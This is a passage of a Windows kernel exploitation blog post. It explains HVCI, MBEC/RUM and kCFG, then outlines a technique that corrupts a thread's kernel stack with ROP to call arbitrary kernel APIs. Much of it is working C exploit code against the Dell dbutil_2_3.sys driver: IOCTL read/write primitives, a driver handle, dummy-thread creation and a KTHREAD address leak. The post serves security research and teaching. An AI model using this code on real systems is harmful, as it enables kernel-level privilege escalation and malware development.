Remember that HVCI is used to ensure there is no kernel-mode RWX memory. So, even though the EPTE says a user-mode page is RWX, the PTE (for a user-mode page) will enforce DEP by marking data pages as non-executable. This non-executable permission on the PTE will enforce the NX permission. Recall that we said EPTEs can “trump” PTEs - we didn’t say they always do this in 100 percent of cases. A case where the PTE is used, instead needing to “go” to the EPTE, would be DEP. If a given page is already marked as non-executable in the PTE, why would the EPTE need to be checked? The PTE itself would prevent execution of code in this page, it would be redundant to check it again in the EPTE. Instead, an example of when the EPTE is checked if a PTE is marked as executable. The EPTE is checked to ensure that page is actually executable. The PTE is the first line of defense. If something “gets around the PTE” (e.g. a page is executable) the CPU will check the EPTE to ensure the page actually is executable. This is why the EPTEs mark all user-mode pages as RWX, because the PTE itself already enforces DEP for the user-mode address space.

The EPTE structure doesn’t have a U/S bit and, therefore, relies on the current privilege level (CPL) of a processor executing code to enforce if code should be executed as kernel mode or user mode. The CPU, in this case, will rely on the standard page table entries to determine what the CPL of the code segment should be when code is executing - meaning an attacker can take advantage of the fact that user-mode pages are marked as RWX, by default, in the EPTEs, and then flip the U/S bit to a supervisor (kernel) page. The CPU will then execute the code as kernel mode.

This means that the only thing to enforce the kernel/user boundary (for code execution purposes) is the CPU (via SMEP). SMEP, as we know, essentially doesn’t allow user-mode code execution from the kernel. So, to get around this, we can use PTE corruption (as shown in my previously-linked blog on PTE overwrites) to mark a user-mode page as a kernel-mode one. When the kernel now goes to execute our shellcode it will “recognize” the shellcode page (technically in the user-mode address space) as a kernel-mode page. EPTEs don’t have a “bit” to define if a given page is kernel or user, so it relies on the already existing SMEP technology to enforce this - which uses “normal” PTEs to determine if a given page is a kernel-mode or user-mode page. Since the EPTEs are only looking at the executable permissions, and not a U/S bit - this means the “old” primitive of “tricking” the CPU into executing a “fake” kernel-mode page exists - as EPTEs still rely on the CPU to enforce this boundary. So when a given user-mode page is being executed, the EPTEs assume this is a user-mode page - and will gladly execute it. The CPU, however, has it’s code segment executing in ring 0 (kernel mode) because the PTE of the page was corrupted to mark it as a “kernel-mode” page (a la the “U/S SMEP bypass”).

To compensate for this, Intel has a hardware solution known as Mode-Based Execution Control, or MBEC. For CPUs that cannot support MBEC Microsoft has its own emulation of MBEC called Restricted User Mode, or RUM.

I won’t get into the nitty-gritty details of the nuanced differences between RUM and MBEC, but these are solutions which mitigate the exact scenario I just mentioned. Essentially what happens is that anytime execution is in the kernel on Windows, all of the user-mode pages as non-executable. Here is how this would look (please note that the EPTE “bits” are just “psuedo” EPTE bits, and are not indicative of what the EPTE bits actually look like).

First, the token-stealing payload is allocated in user-mode as RWX. The PTE is then corrupted to mark the shellcode page as a kernel-mode page.

Then, as we know, the function pointer is overwritten and execution returns to user-mode (but the code is executed in context of the kernel).

Notice what happens above. At the EPTE level (this doesn’t occur at the PTE level) the page containing the shellcode is marked as non-executable. Although the diagram shows us clearing the execute bit, the way the user-mode pages are marked as non-executable is actually done by adding an extra bit in the EPTE structure that allows the EPTE for the user-mode page to be marked as non-executable while execution is residing in the kernel (e.g. the code segment is “in ring 0”). This bit is a member of the EPTE structure that we can refer to as “ExecuteForUserMode”.

This is an efficient way to mark user-mode code pages as non-executable. When kernel-mode code execution occurs, all of the EPTEs for the user-mode pages are simply just marked as non-executable.

MBEC is really great - but what about computers which support HVCI but don’t support MBEC (which is a hardware technology)? For these cases Microsoft implemented RUM (Restricted User Mode). RUM achieves the same thing as MBEC, but in a different way. RUM essentially forces the hypervisor to keep a second set of EPTEs - with this “new” set having all user-mode pages marked as non-executable. So, essentially using the same method as loading a new PML4 address into CR3 for “normal” paging - the hypervisor can load the “second” set of extended page tables (with this “new/second” set marking all user-mode as non-executable) into use. This means each time execution transitions from kernel-mode to user-mode, the paging structures are swapped out - which increases the overhead of the system. This is why MBEC is less strenuous - as it can just mark a bit in the EPTEs. However, when MBEC is not supported - the EPTEs don’t have this ExecuteForUserMode bit - and rely on the second set of EPTEs.

At this point we have spent a lot of time talking about HVCI, MBEC, and RUM. We can come to the following conclusions now:

  1. PTE manipulation to achieve unsigned-code execution is impossible
  2. Any unsigned-code execution in the kernel is impossible

Knowing this, a different approach is needed. Let’s talk about now how we can use an arbitrary read/write primitive to our advantage to get around HVCI, MBEC/RUM, without being limited to only hot-swapping tokens for privilege escalation.

From Read/Write To Arbitrary Kernel-Mode Function Invocation

I did a writeup of a recent Dell BIOS driver vulnerability awhile ago, where I achieved unsigned-code execution in the kernel via PTE manipulation. Afterwards I tweeted out that readers should take into account that this exploit doesn’t consider VBS/HVCI. I eventually received a response from @d_olex on using a different method to take advantage of a kernel-mode vulnerability, with HVCI enabled, by essentially putting together your own kernel-mode API calls.

This was about a year ago - and I have been “chewing” on this idea for awhile. Dmytro later released a library outlining this concept.

This technique is the basis for how we will “get around” VBS/HVCI in this blog. We can essentially instrument a kernel-mode ROP chain that will allow us to call into any kernel-mode API we wish (while redirecting execution in a way that doesn’t trigger Kernel Control Flow Guard, or kCFG).

Why might we want to do this - in-lieu of the inability to execute shellcode, as a result of HVCI? The beauty of executing unsigned-code is the fact that we aren’t just limited to something like token stealing. Shellcode also provides us a way to execute arbitrary Windows API functions, or further corrupt memory. Think about something like a Cobalt Strike Beacon agent - it leverages Windows API functions for network communications, etc. - and is foundational to most malware.

Although with HVCI we can’t invoke our own shellcode in the kernel - it is still possible to “emulate” what kernel-mode shellcode may intend to do, which is calling arbitrary functions in kernel mode. Here is how we can achieve this:

  1. In our exploit, we can create a “dummy” thread in a suspended state via CreateThread.
  2. Assuming our exploit is running from a “normal” process (running in medium integrity), we can use NtQuerySystemInformation to leak the KTHREAD object associated with the suspended thread. From here we can leak KTHREAD.StackBase - which would give us the address of the kernel-mode stack in order to write to it (each thread has its own stack, and stack control is a must for a ROP chain)
  3. We can locate a return address on the stack and corrupt it with our first ROP gadget, using our kernel arbitrary write vulnerability (this gets around kCFG, or Control Flow Guard in the kernel, since kCFG doesn’t inspect backwards edge control-flow transfers like ret. However, in the future when kCET (Control-Flow Enforcement Technology in the Windows kernel) is mainstream on Windows systems, ROP will not work - and this exploit technique will be obsolete).
  4. We then can use our ROP chain in order to call an arbitrary kernel-mode API. After we have called our intended kernel mode API(s), we then end our ROP chain with a call to the kernel-mode function nt!ZwTerminateThread - which allows us to “gracefully” exit our “dummy” thread without needing to use ROP to restore the execution we hijacked.
  5. We then call ResumeThread on the suspended thread in order to kick off execution.

Again - I just want to note. This is not an “HVCI bypass” post. HVCI doesn’t not suffer from any vulnerability that this blog post intends to exploit. Instead, this blog shows an alternative method of exploitation that allows us to call any kernel-mode API without triggering HVCI.

Before continuing on - let’s just briefly touch on why we are opting to overwrite a return address on the stack instead of a function pointer - as many of my blogs have done this in the past. As we saw with my previous browser exploitation blog series, CFG is a mitigation that is pretty mainstream on Windows systems. This is true since Windows 10 RS2 - when it came to the kernel. kCFG is present on most systems today - and it is an interesting topic. The CFG bitmap consists of all “valid” functions used in control-flow transfers. The CFG dispatch functions check this bitmap when an indirect-function call happens to ensure that a function pointer is not overwritten with a malicious function. The CFG bitmap (in user mode) is protected by DEP - meaning the bitmap is read-only, so an attacker cannot modify it (the bitmap is stored in ntdll!LdrSystemDllInitBlock+0x8). We can use our kernel debugger to switch our current process to a user-mode process which loads ntdll.dll to verify this via the PTE.

This means an attacker would have to first bypass CFG (in context of a binary exploit which hijacks control-flow) in order to call an API like VirtualProtect to mark this page as writable. Since the permissions are enforced by DEP - the kernel is the security boundary which protects the CFG bitmap, as the PTE (stored in kernel mode) describes the bitmap as read-only. However, when talking about kCFG (in the kernel) there would be nothing that protects the bitmap - since historically the kernel was the highest security boundary. If an adversary has an arbitrary kernel read/write primitive - an adversary could just modify the kCFG bitmap to make everything a valid call target, since the bitmap is stored in kernel mode. This isn’t good, and means we need an “immutable” boundary to protect this bitmap. Recall, however, that with HVCI there is a higher security boundary - the hypervisor!

kCFG is only fully enabled when HVCI is enabled. SLAT is used to protect the kCFG bitmap. As we can see below, when we attempt to overwrite the bitmap, we get an access violation. This is due to the fact that although the PTE for the kCFG bitmap says it is writable, the EPTE can enforce that this page is not writable - and therefore, with kCFG, non-modifiable by an adversary.

So, since we cannot just modify the bitmap to allow us to call anywhere in the address space, and since kCFG will protect function pointers (like nt!HalDispatchTable + 0x8) and not return addresses (as we saw in the browser exploitation series) - we can simply overwrite a return address to hijack control flow. As mentioned previously, kCET will mitigate this - but looking at my current Windows 11 VM (which has a CPU that can support kCET), kCET is not enabled. This can be checked via nt!KeIsKernelCetEnabled and nt!KeIsKernelCetAuditModeEnabled (both return a boolean - which is false currently).

Now that we have talked about control-flow hijacking, let’s see how this looks practically! For this blog post we will be using the previous Dell BIOS driver exploit I talked about to demonstrate this. To understand how the arbitrary read/write primitive works, I highly recommend you read that blog first. To summarize briefly, there are IOCTLs within the driver that allow us to read one kernel-mode QWORD at a time and to write one QWORD at a time, from user mode, into kernel mode.

“Dummy Thread” Creation to KTHREAD Leak

First, our exploit begins by defining some IOCTL codes and some NTSTATUS codes.

//
// Vulnerable IOCTL codes
//
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

//
// NTSTATUS codes
//
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_SUCCESS 0x00000000

Let’s also outline our - read64() and write64(). These functions give us an arbitrary read/write primitive (I won’t expand on these. See the blog post related to the vulnerability for more information.

read64():

ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (read primitive)
	//
	ULONG64 inBuf[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	//
	// Assign the values
	//
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	//
	// Interact with the driver
	//
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_READ_CODE,
		&inBuf,
		sizeof(inBuf),
		&inBuf,
		sizeof(inBuf),
		&bytesReturned,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return the QWORD
		//
		return inBuf[3];
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return an error
	//
	return (ULONG64)1;
}

write64():

BOOL write64(HANDLE inHandle, ULONG64 WHERE, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (write primitive)
	//
	ULONG64 inBuf1[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	//
	// Assign the values
	//
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	//
	// Interact with the driver
	//
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_WRITE_CODE,
		&inBuf1,
		sizeof(inBuf1),
		&inBuf1,
		sizeof(inBuf1),
		&bytesReturned1,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return TRUE
		//
		return TRUE;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return FALSE (arbitrary write failed)
	//
	return FALSE;
}

Now that we have our primitives established, we start off by obtaining a handle to the driver in order to communicate with it. We will need to supply this value for our read/write primitives.

HANDLE getHandle(void)
{
	//
	// Obtain a handle to the driver
	//
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
		0x0,
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	//
	// Error handling
	//
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the driver handle
		//
		return driverHandle;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

We can invoke this function in main().

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

After obtaining the handle, we then can setup our “dummy thread” by creating a thread in a suspended state. This is the thread we will perform our exploit work in. This can be achieved via CreateThread (again, the key here is to create this thread in a suspended state. More on this later).

/**
 * @brief Function used to create a "dummy thread"
 *
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 *
 * @param Void.
 * @return A handle to the "dummy thread"
 */
HANDLE createdummyThread(void)
{
	//
	// Invoke CreateThread
	//
	HANDLE dummyThread = CreateThread(
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)randomFunction,
		NULL,
		CREATE_SUSPENDED,
		NULL
	);

	//
	// Error handling
	//
	if (dummyThread == (HANDLE)-1)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the handle to the thread
		//
		return dummyThread;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

You’ll see that our createdummyThread function returns a handle to the “dummy thread”. Notice that the LPTHREAD_START_ROUTINE for the thread goes to randomFunction, which we also can define. This thread will never actually execute this function via its entry point, so we will just supply a simple function which does “nothing”.

We then can call createdummyThread within main() to execute the call. This will create our “dummy thread”.

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke getthreadHandle() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

Now we have a thread that is running in a suspended state and a handle to the driver.

Since we have a suspended thread running now, the goal currently is to leak the KTHREAD object associated with this thread, which is the kernel-mode representation of the thread. We can achieve this by invoking NtQuerySystemInformation. The first thing we need to do is add the structures required by NtQuerySystemInformation and then prototype this function, as we will need to resolve it via GetProcAddress. For this I just add a header file named ntdll.h - which will contain this prototype (and more structures coming up shortly).

#include <Windows.h>
#include <Psapi.h>

typedef enum _SYSTEM_INFORMATION_CLASS
{
    SystemBasicInformation,
    SystemProcessorInformation,
    SystemPerformanceInformation,
    SystemTimeOfDayInformation,
    SystemPathInformation,
    SystemProcessInformation,
    SystemCallCountInformation,
    SystemDeviceInformation,
    SystemProcessorPerformanceInformation,
    SystemFlagsInformation,
    SystemCallTimeInformation,
    SystemModuleInformation,
    SystemLocksInformation,
    SystemStackTraceInformation,
    SystemPagedPoolInformation,
    SystemNonPagedPoolInformation,
    SystemHandleInformation,
    SystemObjectInformation,
    SystemPageFileInformation,
    SystemVdmInstemulInformation,
    SystemVdmBopInformation,
    SystemFileCacheInformation,
    SystemPoolTagInformation,
    SystemInterruptInformation,
    SystemDpcBehaviorInformation,
    SystemFullMemoryInformation,
    SystemLoadGdiDriverInformation,
    SystemUnloadGdiDriverInformation,
    SystemTimeAdjustmentInformation,
    SystemSummaryMemoryInformation,
    SystemMirrorMemoryInformation,
    SystemPerformanceTraceInformation,
    SystemObsolete0,
    SystemExceptionInformation,
    SystemCrashDumpStateInformation,
    SystemKernelDebuggerInformation,
    SystemContextSwitchInformation,
    SystemRegistryQuotaInformation,
    SystemExtendServiceTableInformation,
    SystemPrioritySeperation,
    SystemVerifierAddDriverInformation,
    SystemVerifierRemoveDriverInformation,
    SystemProcessorIdleInformation,
    SystemLegacyDriverInformation,
    SystemCurrentTimeZoneInformation,
    SystemLookasideInformation,
    SystemTimeSlipNotification,
    SystemSessionCreate,
    SystemSessionDetach,
    SystemSessionInformation,
    SystemRangeStartInformation,
    SystemVerifierInformation,
    SystemVerifierThunkExtend,
    SystemSessionProcessInformation,
    SystemLoadGdiDriverInSystemSpace,
    SystemNumaProcessorMap,
    SystemPrefetcherInformation,
    SystemExtendedProcessInformation,
    SystemRecommendedSharedDataAlignment,
    SystemComPlusPackage,
    SystemNumaAvailableMemory,
    SystemProcessorPowerInformation,
    SystemEmulationBasicInformation,
    SystemEmulationProcessorInformation,
    SystemExtendedHandleInformation,
    SystemLostDelayedWriteInformation,
    SystemBigPoolInformation,
    SystemSessionPoolTagInformation,
    SystemSessionMappedViewInformation,
    SystemHotpatchInformation,
    SystemObjectSecurityMode,
    SystemWatchdogTimerHandler,
    SystemWatchdogTimerInformation,
    SystemLogicalProcessorInformation,
    SystemWow64SharedInformation,
    SystemRegisterFirmwareTableInformationHandler,
    SystemFirmwareTableInformation,
    SystemModuleInformationEx,
    SystemVerifierTriageInformation,
    SystemSuperfetchInformation,
    SystemMemoryListInformation,
    SystemFileCacheInformationEx,
    MaxSystemInfoClass

} SYSTEM_INFORMATION_CLASS;

typedef struct _SYSTEM_MODULE {
    ULONG                Reserved1;
    ULONG                Reserved2;
    PVOID                ImageBaseAddress;
    ULONG                ImageSize;
    ULONG                Flags;
    WORD                 Id;
    WORD                 Rank;
    WORD                 w018;
    WORD                 NameOffset;
    BYTE                 Name[256];
} SYSTEM_MODULE, * PSYSTEM_MODULE;

typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG                ModulesCount;
    SYSTEM_MODULE        Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    ULONG ProcessId;
    UCHAR ObjectTypeNumber;
    UCHAR Flags;
    USHORT Handle;
    void* Object;
    ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;

// Prototype for ntdll!NtQuerySystemInformation
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);

Invoking NtQuerySystemInformation is a mechanism that allows us to leak the KTHREAD object - so we will not go over each of these structures in-depth. However, it is worthwhile to talk about NtQuerySystemInformation itself.

NtQuerySystemInformation is a function which can be invoked from a medium-integrity process. More specifically there are specific “classes” from the SYSTEM_INFORMATION_CLASS enum that aren’t available to low-integrity or AppContainer processes - such as browser sandboxes. So, in this case, you would need a genuine information leak. However, since we are assuming medium integrity (this is the default integrity level Windows processes use), we will leverage NtQuerySystemInformation.

We first create a function which resolves NtQuerySystemInformation.

/**
 * @brief Function to resolve ntdll!NtQuerySystemInformation.
 *
 * This function is used to resolve ntdll!NtQuerySystemInformation.
 * ntdll!NtQuerySystemInformation allows us to leak kernel-mode
 * memory, useful to our exploit, to user mode from a medium
 * integrity process.
 *
 * @param Void.
 * @return A pointer to ntdll!NtQuerySystemInformation.

 */
NtQuerySystemInformation_t resolveFunc(void)
{
	//
	// Obtain a handle to ntdll.dll (where NtQuerySystemInformation lives)
	//
	HMODULE ntdllHandle = GetModuleHandleW(L"ntdll.dll");

	//
	// Error handling
	//
	if (ntdllHandle == NULL)
	{
		// Bail out
		goto exit;
	}

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t func = (NtQuerySystemInformation_t)GetProcAddress(
		ntdllHandle,
		"NtQuerySystemInformation"
	);

	//
	// Error handling
	//
	if (func == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Print update
		//
		printf("[+] ntdll!NtQuerySystemInformation: 0x%p\n", func);

		//
		// Return the address
		//
		return func;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return (NtQuerySystemInformation_t)1;
}

After resolving the function, we can add a function which contains our “logic” for leaking the KTHREAD object associated with our “dummy thread”. This function will call leakKTHREAD - which accepts a parameter, which is the thread for which we want to leak the object (in this case it is our “dummy thread”). This is done by leveraging the SystemHandleInformation class (which is blocked from low-integrity processes). From here we can enumerate all handles that are thread objects on the system. Specifically, we check all thread objects in our current process for the handle of our “dummy thread”.

/**
 * @brief Function used to leak the KTHREAD object
 *
 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 *
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
 */
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
{
	//
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation
	//
	NTSTATUS retValue = STATUS_INFO_LENGTH_MISMATCH;

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	//
	// Error handling
	//
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Set size to 1 and loop the call until we reach the needed size
	//
	int size = 1;

	//
	// Output size
	//
	int outSize = 0;

	//
	// Output buffer
	//
	PSYSTEM_HANDLE_INFORMATION out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

	//
	// Error handling
	//
	if (out == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// do/while to allocate enough memory necessary for NtQuerySystemInformation
	//
	do
	{
		//
		// Free the previous memory
		//
		free(out);

		//
		// Increment the size
		//
		size = size * 2;

		//
		// Allocate more memory with the updated size
		//
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		//
		// Error handling
		//
		if (out == NULL)
		{
			//
			// Bail out
			//
			goto exit;
		}

		//
		// Invoke NtQuerySystemInformation
		//
		retValue = NtQuerySystemInformation(
			SystemHandleInformation,
			out,
			(ULONG)size,
			&outSize
		);
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	//
	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	//
	if (retValue != STATUS_SUCCESS)
	{
		//
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		//
		if (out != NULL)
		{
			//
			// Free the memory
			//
			free(out);

			//
			// Bail out
			//
			goto exit;
		}

		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		//
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
		{
			//
			// Store the current object's type number
			// Thread object = 0x8
			//
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			//
			// Are we dealing with a handle from the current process?
			//
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
			{
				//
				// Is the handle the handle of the "dummy" thread we created?
				//
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
				{
					//
					// Grab the actual KTHREAD object corresponding to the current thread
					//
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					//
					// Free the memory
					//
					free(out);

					//
					// Return the KTHREAD object
					//
					return kthreadObject;
				}
			}
		}
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle to the "dummy thread"
	//
	CloseHandle(
		dummythreadHandle
	);

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)retValue;
}

Here is how our main() function looks now:

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke getthreadHandle() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakKTHREAD()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	//
	if ((!kthread & 0x80000000) == 0x80000000)
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	//
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// getchar() to pause execution
	//
	getchar();

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

You’ll notice in the above code we have added a getchar() call - which will keep our .exe running after the KTHREAD object is leaked. After running the .exe, we can see we leaked the KTHREAD object of our “dummy thread” at 0xffffa50f0fdb8080. Using WinDbg we can parse this address as a KTHREAD object.

We have now successfully located the KTHREAD object associated with our “dummy” thread.

From KTHREAD Leak To Arbitrary Kernel-Mode API Calls

With our KTHREAD leak, we can also use the !thread WinDbg extension to reveal the call stack for this thread.

You’ll notice the function nt!KiApcInterrupt is a part of this kernel-mode call stack for our “dummy thread”. What is this?

Recall that our “dummy thread” is in a suspended state. When a thread is created on Windows, it first starts out running in kernel-mode. nt!KiStartUserThread is responsible for this (and we can see this in our call stack). This eventually results in nt!PspUserThreadStartup being called - which is the initial thread routine, according to Windows Internals Part 1: 7th Edition. Here is where things get interesting.

After the thread is created, the thread is then put in its “suspended state”. A suspended thread, on Windows, is essentially a thread which has an APC queued to it - with the APC “telling the thread” to “do nothing”. An APC is a way to “tack on” some work to a given thread, when the thread is scheduled to execute. What is interesting is that queuing an APC causes an interrupt to be issued. An interrupt is essentially a signal that tells a processor something requires immediate attention. Each processor has a given interrupt request level, or IRQL, in which it is running. APCs get processed in an IRQL level known as APC_LEVEL, or 1. IRQL values span from 0 - 31 - but usually the most “common” ones are PASSIVE_LEVEL (0), APC_LEVEL (1), or DISPATCH_LEVEL (2). Normal user-mode and kernel-mode code run at PASSIVE_LEVEL. What is interesting is that when the IRQL of a processor is at 1, for instance (APC_LEVEL), only interrupts that can be processed at a higher IRQL can interrupt the processor. So, if the processor is running at an IRQL of APC_LEVEL, kernel-mode/user-mode code wouldn’t run until the processor is brought back down to PASSIVE_LEVEL.

The function that is called directly before nt!KiApcInterrupt in our call stack is, as mentioned, nt!PspUserThreadStartup - which is the “initial thread routine”. If we examine this return address nt!PspUserThreadStartup + 0x48, we can see the following.

The return address contains the instruction mov rsi, gs:188h. This essentially will load gs:188h (the GS segment register, when in kernel-mode, points to the KPCR structure, which, at an offset of 0x180 points to the KPRCB structure. This structure contains a pointer to the current thread at an offset of 0x8 - so 0x180 + 0x8 = 0x188. This means that gs:188h points to the current thread).

When a function is called, a return address is placed onto the stack. What a return address actually is, is the address of the next instruction. You can recall in our IDA screenshot that since mov rsi, gs:188h is the instruction of the return address, this instruction must have been the “next” instruction to be executed when it was pushed onto the stack. What this means is that whatever the instruction before mov rsi, gs:188h was caused the “function call” - or change in control-flow - to ntKiApcInterrupt. This means the instruction before, mov cr8, r15 was responsible for this. Why is this important?

Control registers are a per-processor register. The CR8 control register manages the current IRQL value for a given processor. So, what this means is that whatever is in R15 at the time of this instruction contains the IRQL that the current processor is executing at. How can we know what level this is? All we have to do is look at our call stack again!

